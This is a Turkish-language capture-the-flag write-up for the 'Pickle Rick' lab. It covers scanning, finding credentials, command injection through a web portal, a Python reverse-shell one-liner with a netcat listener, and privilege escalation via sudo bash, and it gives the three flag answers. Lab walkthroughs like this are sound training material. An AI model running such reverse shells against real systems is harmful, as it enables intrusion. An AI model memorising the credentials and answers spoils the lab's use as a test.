Pickle Rick
This Rick and Morty-themed challenge requires you to exploit a web server and find three ingredients to help Rick make his potion and transform himself back into a human from a pickle.
Rick’in ihtiyacı olan ilk malzeme nedir?
Her zamanki gibi nmap taraması ile başlayalım
80 portunda web sitesi çalıştığnı görüyoruz.
Sayfanın kaynak koduna baktığımız zaman kullanıcı adını görüyoruz.
Gobuster çalıştırıp gizli dizin arayalım.
robots.txt login.php ve portal.php sayfalarını bulduk.
robot.txt yi açtığımızda karşımıza çıkan sayfa. Şifre olabileceğini düşünerek login sayfasına giriş yapmayı deniyorum.
Giriş yapmayı başardım.
R1ckRul3s:Wubbalubbadubdub
Komut çalıştırmayı deneyelim.
Bu dosyanın içeriği cat komutu ile kontrol edilmek istendiğinde komut engelleniyor
Konsola python reverse shell komutu yazmayı deniyorum. Reverse Shell Generator kullanıyorum.
1
export RHOST="10.14.61.127";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
netcat çalıştırmayı unutmayın.
1
nc -nvlp 1234
Makineye girmeyi başardık.
Bu aşamadan sonra makinede araştırma yapmak kalıyor.
İlk sorunun cevabına ulaşıyoruz.
mr. meeseek hair
Devam edelim.
İkinci sorunun cevabına ulaştık.
1 jerry tear
Son sorunun cevabı root dizininde. Root dizinine ulaşmak içinde root yetkisine sahip olmak gerekir. Bu sistemde yetki yükseltme komutları için hiçbir önlem alınmamış. O yüzden herhangi bir root yükseltme komutu ile yetki yükseltilebilir. Ben root yükseltmek için sudo bash komutunu kullandım
Son sorunun cevabını buluyoruz.
fleeb juice
